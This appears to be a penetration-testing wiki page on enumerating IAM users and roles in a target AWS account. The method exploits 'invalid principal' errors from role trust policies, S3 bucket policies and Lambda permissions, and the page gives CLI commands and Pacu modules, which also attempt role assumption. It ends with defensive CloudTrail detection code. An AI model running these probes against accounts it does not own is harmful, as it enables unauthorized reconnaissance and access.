Enumerate (Unauthenticated) IAM Users and Roles
Exploiting an AWS feature of the IAM Role Trust Policy allowing for unauthenticated enumeration of AWS IAM Users and Roles in AWS Accounts.
We need to know the AWS Account ID for this technique to work. Refer to Enumerate AWS Account IDs for methods on how to obtain this.
Unauthenticated Enumeration of IAM Users and Roles
Essentially, when updating an IAM Role's Trust Policy, AWS validates every principal ARN in the document: the update succeeds if the principal exists and returns an error if it does not.
Because a non-existent ARN produces an error, the response reveals whether a given user or role exists in the target account, without any credentials for that account.
Leveraging AWS Console
First, create an IAM Role and then update its Trust Policy.
Principals can be specified in an IAM Role's policy, and the console will show an error if the principal is invalid.

Leveraging AWS CLI
Principals can be specified in an IAM Role's policy and will provide an error if the principal is invalid.

Create an IAM Role trust policy (roletrustpolicy.json) with a valid principal:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:user/valid-user"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

Create the IAM Role:

aws iam create-role --role-name myRole --assume-role-policy-document file://roletrustpolicy.json

Update the policy with the user/role to test:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:user/bob"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

Update the Role with the new Policy:

aws --profile lab iam update-assume-role-policy --role-name <MyRoleName> --policy-document file://roletrustpolicy.json

An error occurred (MalformedPolicyDocument) when calling the UpdateAssumeRolePolicy operation: Invalid principal in policy: "AWS":"arn:aws:iam::111111111111:user/bob"

Leveraging Pacu
Pacu provides modules that automatically attempt to enumerate valid IAM Users and Roles in an AWS account using this method.
Pacu will also attempt to assume the role, which will provide credentials for the role.
Default wordlists are used unless you specify your own.

run iam__enum_users --role-name <MyRoleName> --account-id 111111111111
run iam__enum_roles --role-name <MyRoleName> --account-id 111111111111
run iam__enum_users --role-name <MyRoleName> --account-id 111111111111 --word-list <myUser/RoleList>

Leveraging S3
Principals can be specified in an S3 Bucket's policy and will provide an error if the principal is invalid.

Create a bucket:

aws s3api create-bucket --bucket <bucketName>

Bucket policy (s3bucketpolicy.json) naming the user/role to test:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<targetAccountId>:user/bob"
      },
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::<bucketName>"
    }
  ]
}

Apply the policy to the bucket:

aws s3api put-bucket-policy --bucket <bucketName> --policy file://s3bucketpolicy.json

An error occurred (MalformedPolicy) when calling the PutBucketPolicy operation: Invalid principal in policy

Leveraging Lambda
Principals can be specified in a Lambda Function's resource policy and will provide an error if the principal is invalid.

Create Trust Policy for IAM Role (lambdapolicy.json):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Service": "lambda.amazonaws.com"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

Create IAM Role:

aws iam create-role --role-name lambda-role --assume-role-policy-document file://lambdapolicy.json

Create Function Code (functioncode.py):

def lambda_handler(event, context):
    print(event)
    return 'Hello from Lambda!'

Zip the Function Code:

zip functioncode.zip functioncode.py

Create the Function (the handler must match the file and function names above, i.e. functioncode.lambda_handler):

aws lambda create-function --function-name tylertestiamprincipals --runtime python3.9 --zip-file fileb://functioncode.zip --handler functioncode.lambda_handler --role arn:aws:iam::111111111111:role/lambda-role

Add a resource-policy statement naming the user/role to test:

aws lambda add-permission --function-name tylertestiamprincipals --action lambda:ListFunctions --statement-id tylertestiamprincipals2 --principal "arn:aws:iam::111111111111:role/sally"

An error occurred (InvalidParameterValueException) when calling the AddPermission operation: The provided principal was invalid. Please check the principal and try again.
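The enumerated account never sees these probes, but the account they are run from does: each of the three calls above (UpdateAssumeRolePolicy, PutBucketPolicy, AddPermission) leaves an "invalid principal" failure in that account's CloudTrail. The following is an added defender-side example, not code from this page, Pacu or AWS, that flags an identity generating a burst of such failures and lists the foreign account IDs it named; the CloudTrail records are constructed samples and the requestParameters shapes are assumptions.

```python
import json
import re
from collections import defaultdict
# Probes on this page (UpdateAssumeRolePolicy, PutBucketPolicy, AddPermission) fail in the *probing*
# account's CloudTrail; the enumerated account logs nothing. Constructed samples; field shapes assumed.
def _ev(name, source, params, err=None, msg=None, actor="arn:aws:iam::222222222222:user/ops"):
    return {"eventName": name, "eventSource": source, "recipientAccountId": "222222222222",
            "userIdentity": {"arn": actor}, "requestParameters": params,
            "errorCode": err, "errorMessage": msg}
def _trust(principal):  # trust-policy document in the shape used on this page
    return json.dumps({"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
                       "Principal": {"AWS": principal}, "Action": "sts:AssumeRole"}]})
SAMPLE_EVENTS = [
    _ev("UpdateAssumeRolePolicy", "iam.amazonaws.com",
        {"roleName": "myRole", "policyDocument": _trust(f"arn:aws:iam::111111111111:user/{n}")},
        "MalformedPolicyDocumentException",
        f'Invalid principal in policy: "AWS":"arn:aws:iam::111111111111:user/{n}"')
    for n in ("bob", "alice", "carol", "dave")
] + [
    _ev("PutBucketPolicy", "s3.amazonaws.com", {"bucketName": "probe-bucket", "bucketPolicy":
        {"Statement": [{"Principal": {"AWS": "arn:aws:iam::111111111111:role/deploy"}}]}},
        "MalformedPolicy", "Invalid principal in policy"),
    _ev("AddPermission", "lambda.amazonaws.com",
        {"functionName": "probe-fn", "principal": "arn:aws:iam::111111111111:role/sally"},
        "InvalidParameterValueException", "The provided principal was invalid."),
    _ev("UpdateAssumeRolePolicy", "iam.amazonaws.com",  # legitimate, successful own-account edit
        {"roleName": "myRole", "policyDocument": _trust("arn:aws:iam::222222222222:user/valid-user")}),
    _ev("UpdateAssumeRolePolicy", "iam.amazonaws.com",  # one typo by another identity: below threshold
        {"roleName": "ci", "policyDocument": _trust("arn:aws:iam::333333333333:role/ci-runnerr")},
        "MalformedPolicyDocumentException", "Invalid principal in policy",
        actor="arn:aws:iam::222222222222:role/ci"),
]
PROBE_CALLS = {"UpdateAssumeRolePolicy", "PutBucketPolicy", "AddPermission"}
ACCOUNT_RE = re.compile(r"arn:aws:iam::(\d{12}):(?:user|role)/")

def is_invalid_principal_failure(event):
    msg = (event.get("errorMessage") or "").lower()
    return event.get("eventName") in PROBE_CALLS and "invalid" in msg and "principal" in msg

def probed_accounts(event):  # foreign account IDs named as principals, whatever the parameter shape
    blob = json.dumps(event.get("requestParameters", {}))
    return {a for a in ACCOUNT_RE.findall(blob) if a != event.get("recipientAccountId")}

def find_enumeration_bursts(events, threshold=5):  # identity -> failure count and accounts it probed
    stats = defaultdict(lambda: {"failures": 0, "accounts": set()})
    for ev in filter(is_invalid_principal_failure, events):
        who = ev.get("userIdentity", {}).get("arn", "unknown")
        stats[who]["failures"] += 1
        stats[who]["accounts"] |= probed_accounts(ev)
    return {who: {"failures": s["failures"], "accounts": sorted(s["accounts"])}
            for who, s in stats.items() if s["failures"] >= threshold}
```

On the sample records only the "ops" user is flagged (six failures, all naming account 111111111111); the one-off typo from the "ci" role and the successful own-account update are not.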